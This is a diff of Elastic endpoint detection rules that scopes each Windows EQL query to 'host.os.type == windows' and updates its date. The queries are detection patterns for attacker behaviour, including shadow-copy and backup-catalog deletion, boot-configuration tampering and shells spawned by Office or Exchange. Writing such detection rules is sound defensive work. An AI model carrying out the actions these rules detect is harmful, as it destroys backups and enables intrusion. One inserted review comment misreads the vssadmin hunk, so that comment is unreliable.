 not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4",
diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml
index 5d56671c8..305863e33 100644
--- a/rules/windows/execution_scheduled_task_powershell_source.toml
+++ b/rules/windows/execution_scheduled_task_powershell_source.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,9 +29,9 @@ type = "eql"
 query = '''
 sequence by host.id, process.entity_id with maxspan = 5s
- [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
+ [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
 (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe")]
- [network where process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and destination.port == 135 and not destination.address in ("127.0.0.1", "::1")]
+ [network where host.os.type == "windows" and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and destination.port == 135 and not destination.address in ("127.0.0.1", "::1")]
 '''
diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml
index 37d3f89d1..160dbc7b2 100644
--- a/rules/windows/execution_shared_modules_local_sxs_dll.toml
+++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where file.extension : "dll" and file.path : "C:\\*\\*.exe.local\\*.dll"
+file where host.os.type == "windows" and file.extension : "dll" and file.path : "C:\\*\\*.exe.local\\*.dll"
 '''
diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml
index d1bdb9264..4a87ad68a 100644
--- a/rules/windows/execution_suspicious_cmd_wmi.toml
+++ b/rules/windows/execution_suspicious_cmd_wmi.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "WmiPrvSE.exe" and process.name : "cmd.exe" and process.args : "\\\\127.0.0.1\\*" and process.args : ("2>&1", "1>")
 '''
diff --git a/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml b/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml
index c0010f8ff..cf0f11283 100644
--- a/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml
+++ b/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where
+any where host.os.type == "windows" and
 (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE") and (dll.name : "wmiutils.dll" or file.name : "wmiutils.dll")
diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml
index f7fb2577f..28b0eaefa 100644
--- a/rules/windows/execution_suspicious_pdf_reader.toml
+++ b/rules/windows/execution_suspicious_pdf_reader.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -77,7 +77,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : ("AcroRd32.exe", "Acrobat.exe", "FoxitPhantomPDF.exe",
diff --git a/rules/windows/execution_suspicious_powershell_imgload.toml b/rules/windows/execution_suspicious_powershell_imgload.toml
index 4112626eb..5b129a442 100644
--- a/rules/windows/execution_suspicious_powershell_imgload.toml
+++ b/rules/windows/execution_suspicious_powershell_imgload.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -90,7 +90,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and
+any where host.os.type == "windows" and (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and
 (dll.name : ("System.Management.Automation.ni.dll", "System.Management.Automation.dll") or file.name : ("System.Management.Automation.ni.dll", "System.Management.Automation.dll")) and
diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml
index 8602dc443..2b192ea31 100644
--- a/rules/windows/execution_suspicious_psexesvc.toml
+++ b/rules/windows/execution_suspicious_psexesvc.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -60,7 +60,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.pe.original_file_name : "psexesvc.exe" and not process.name : "PSEXESVC.exe"
 '''
diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml
index a925b6d82..aee5002a3 100644
--- a/rules/windows/execution_via_compiled_html_file.toml
+++ b/rules/windows/execution_via_compiled_html_file.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
 [rule]
 author = ["Elastic"]
@@ -94,7 +94,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "hh.exe" and process.name : ("mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "cscript.exe", "wscript.exe")
 '''
diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml
index 7d711838e..84db8fc88 100644
--- a/rules/windows/execution_via_hidden_shell_conhost.toml
+++ b/rules/windows/execution_via_hidden_shell_conhost.toml
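Review bot: `updated_date` for execution_via_compiled_html_file.toml is bumped to `2023/03/02` in the metadata hunk directly above this query hunk, while every other rule in the change, including execution_suspicious_psexesvc.toml on the same line, is bumped to `2023/02/22`. If this file received no later edit than the `host.os.type == "windows"` clause added on the `+process where …` line, the date should read `updated_date = "2023/02/22"` so the set stays consistent. The query change itself matches the sibling rules.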
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "conhost.exe" and process.parent.name : ("lsass.exe", "services.exe", "smss.exe", "winlogon.exe", "explorer.exe", "dllhost.exe", "rundll32.exe", "regsvr32.exe", "userinit.exe", "wininit.exe", "spoolsv.exe", "ctfmon.exe") and
diff --git a/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml
index b3c81ff9f..3e599d42d 100644
--- a/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml
+++ b/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -63,7 +63,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "cmd.exe" and process.parent.name : "sqlservr.exe" and not process.args : ("\\\\*", "diskfree", "rmdir", "mkdir", "dir", "del", "rename", "bcp", "*XMLNAMESPACES*", "?:\\MSSQL\\Backup\\Jobs\\sql_agent_backup_job.ps1", "K:\\MSSQL\\Backup\\msdb", "K:\\MSSQL\\Backup\\Logins")
diff --git a/rules/windows/impact_backup_file_deletion.toml b/rules/windows/impact_backup_file_deletion.toml
index 21cdc734d..c29cb3dd7 100644
--- a/rules/windows/impact_backup_file_deletion.toml
+++ b/rules/windows/impact_backup_file_deletion.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -72,7 +72,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type == "deletion" and
+file where host.os.type == "windows" and event.type == "deletion" and
 ( /* Veeam Related Backup Files */ (file.extension : ("VBK", "VIB", "VBM") and
diff --git a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml
index f8c61c521..f4bd7bb07 100644
--- a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml
+++ b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -68,7 +68,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "wbadmin.exe" or process.pe.original_file_name == "WBADMIN.EXE") and process.args : "catalog" and process.args : "delete"
 '''
diff --git a/rules/windows/impact_modification_of_boot_config.toml b/rules/windows/impact_modification_of_boot_config.toml
index 10c0f2341..125fe5dad 100644
--- a/rules/windows/impact_modification_of_boot_config.toml
+++ b/rules/windows/impact_modification_of_boot_config.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -68,7 +68,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "bcdedit.exe" or process.pe.original_file_name == "bcdedit.exe") and ( (process.args : "/set" and process.args : "bootstatuspolicy" and process.args : "ignoreallfailures") or
diff --git a/rules/windows/impact_stop_process_service_threshold.toml b/rules/windows/impact_stop_process_service_threshold.toml
index ffc25cd17..aa8434526 100644
--- a/rules/windows/impact_stop_process_service_threshold.toml
+++ b/rules/windows/impact_stop_process_service_threshold.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -56,7 +56,7 @@ tags = ["Elastic", "Host", "Windows", "Threat Detection", "Impact", "Investigati
 type = "threshold"
 query = '''
-event.category:process and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and
+event.category:process and host.os.type:windows and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and
 process.args:(stop or pause or delete or "/PID" or "/IM" or "/T" or "/F" or "/t" or "/f" or "/im" or "/pid")
 '''
diff --git a/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml b/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml
index 745b0ad86..2722ab1c4 100644
--- a/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml
+++ b/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -87,7 +87,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start"
+process where host.os.type == "windows" and event.type == "start" and (process.name : "vssadmin.exe" or process.pe.original_file_name == "VSSADMIN.EXE") and process.args in ("delete", "resize") and process.args : "shadows*"
 '''
diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml
index 9a6a99a24..2044d8ed1 100644
--- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml
+++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -91,7 +91,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and process.args : ("*Get-WmiObject*", "*gwmi*", "*Get-CimInstance*", "*gcim*") and process.args : ("*Win32_ShadowCopy*") and
diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml
index 9bd1c1315..b20d13588 100644
--- a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml
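Review bot: In the vssadmin query hunk the removed line ends at `event.type == "start"` with no trailing conjunction, so the `and` that joins the `(process.name : "vssadmin.exe" …)` clause must sit on the continuation line, yet the added line reads `… event.type == "start" and`. If that continuation line still begins with `and (process.name …`, the rewritten query contains `and and` and will not parse; the intended first line is presumably `process where host.os.type == "windows" and event.type == "start"` with the existing `and` left where it was. The collapsed rendering cannot settle this, so it should be checked against the file before merge.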
+++ b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -87,7 +87,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "WMIC.exe" or process.pe.original_file_name == "wmic.exe") and process.args : "delete" and process.args : "shadowcopy"
 '''
diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml
index 09274abdd..e4e7ce35b 100644
--- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml
+++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ type = "eql"
 query = '''
 sequence by user.id with maxspan=5m
- [file where event.action in ("creation", "rename") and
+ [file where host.os.type == "windows" and event.action in ("creation", "rename") and
 file.extension : ("htm", "html") and file.path : ("?:\\Users\\*\\Downloads\\*", "?:\\Users\\*\\Content.Outlook\\*",
@@ -37,7 +37,7 @@ sequence by user.id with maxspan=5m
 "?:\\Users\\*\\AppData\\Local\\Temp\\7z*", "?:\\Users\\*\\AppData\\Local\\Temp\\Rar$*") and ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]
- [process where event.action == "start" and
+ [process where host.os.type == "windows" and event.action == "start" and
 ( (process.name in ("chrome.exe", "msedge.exe", "brave.exe", "whale.exe", "browser.exe", "dragon.exe", "vivaldi.exe", "opera.exe") and process.args == "--single-argument") or
diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml
index e98f0dbe1..ed26baf49 100644
--- a/rules/windows/initial_access_script_executing_powershell.toml
+++ b/rules/windows/initial_access_script_executing_powershell.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -79,7 +79,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : ("cscript.exe", "wscript.exe") and process.name : "powershell.exe"
 '''
diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml
index d67dba175..3cf4009d8 100644
--- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml
+++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/07"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,9 +25,9 @@ type = "eql"
 query = '''
 sequence by host.id with maxspan = 5s
- [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
+ [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
 (dll.name : "wmiutils.dll" or file.name : "wmiutils.dll") and process.name : ("wscript.exe", "cscript.exe")]
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "wmiprvse.exe" and user.domain != "NT AUTHORITY" and (process.pe.original_file_name :
diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml
index de1528346..8d0354881 100644
--- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml
+++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -53,7 +53,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type == "creation" and
+file where host.os.type == "windows" and event.type == "creation" and
 process.name : ("UMWorkerProcess.exe", "umservice.exe") and file.extension : ("php", "jsp", "js", "aspx", "asmx", "asax", "cfm", "shtml") and (
diff --git a/rules/windows/initial_access_suspicious_ms_exchange_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_process.toml
index a6c284bc9..7963790b2 100644
--- a/rules/windows/initial_access_suspicious_ms_exchange_process.toml
+++ b/rules/windows/initial_access_suspicious_ms_exchange_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -39,7 +39,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : ("UMService.exe", "UMWorkerProcess.exe") and not process.executable : ("?:\\Windows\\System32\\werfault.exe",
diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml
index cfcbee974..056438128 100644
--- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml
+++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "w3wp.exe" and process.parent.args : "MSExchange*AppPool" and (process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("cmd.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe"))
diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml
index d892565f3..9dcc862bd 100644
--- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml
+++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/07"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -78,7 +78,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : ("eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe", "mspub.exe", "powerpnt.exe", "winword.exe", "outlook.exe") and process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", "cdb.exe", "certutil.exe", "cmd.exe", "cmstp.exe", "control.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe", "dsquery.exe", "forfiles.exe",
diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml
index 879c9a3f9..b37494da6 100644
--- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml
+++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "outlook.exe" and process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", "cdb.exe", "certutil.exe", "cmd.exe", "cmstp.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe",
diff --git a/rules/windows/initial_access_unusual_dns_service_children.toml b/rules/windows/initial_access_unusual_dns_service_children.toml
index 6a27b25f1..a7ddd566e 100644
--- a/rules/windows/initial_access_unusual_dns_service_children.toml
+++ b/rules/windows/initial_access_unusual_dns_service_children.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -78,7 +78,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and process.parent.name : "dns.exe" and
+process where host.os.type == "windows" and event.type == "start" and process.parent.name : "dns.exe" and
 not process.name : "conhost.exe"
 '''
diff --git a/rules/windows/initial_access_unusual_dns_service_file_writes.toml b/rules/windows/initial_access_unusual_dns_service_file_writes.toml
index db3960a7a..c61fb725f 100644
--- a/rules/windows/initial_access_unusual_dns_service_file_writes.toml
+++ b/rules/windows/initial_access_unusual_dns_service_file_writes.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/30"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -41,7 +41,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where process.name : "dns.exe" and event.type in ("creation", "deletion", "change") and +file where host.os.type == "windows" and process.name : "dns.exe" and event.type in ("creation", "deletion", "change") and not file.name : "dns.log" and not (file.extension : ("old", "temp", "bak", "dns", "arpa") and file.path : "C:\\Windows\\System32\\dns\\*") ''' diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index 52e495f3e..e4650185f 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "rundll32.exe", "cmd.exe", "mshta.exe", "regsvr32.exe") or process.pe.original_file_name in ("cscript.exe", "wscript.exe", "PowerShell.EXE", "RUNDLL32.EXE", "Cmd.Exe", "MSHTA.EXE", "REGSVR32.EXE") diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 3374da4d1..e7191974e 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,11 +25,11 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan = 1m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and (process.name : "sc.exe" or process.pe.original_file_name : "sc.exe") and process.args : "\\\\*" and process.args : ("binPath=*", "binpath=*") and process.args : ("create", "config", "failure", "start")] - [network where process.name : "sc.exe" and destination.ip != "127.0.0.1"] + [network where host.os.type == "windows" and process.name : "sc.exe" and destination.ip != "127.0.0.1"] ''' diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 1c72492fb..a5466c835 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
